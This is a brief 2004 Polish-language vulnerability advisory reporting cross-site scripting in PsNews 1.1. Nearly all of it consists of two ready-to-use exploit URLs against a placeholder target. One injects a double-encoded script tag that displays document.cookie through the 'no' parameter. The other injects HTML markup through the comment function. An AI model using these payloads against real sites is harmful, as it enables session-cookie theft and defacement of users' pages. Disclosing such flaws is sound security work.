°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

*5-9-2004

*Autor: wacky

*E-mail: wacky@nicponie.org

*WWW: http://www.nicponie.org

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

-----------------------------------------------

|BugCross-Site Scripting (XSS) w PsNews 1.1 | 

-----------------------------------------------



Exploit:



a) 

http://[target]/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>



b)

http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>



°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

http://www.nicponie.org/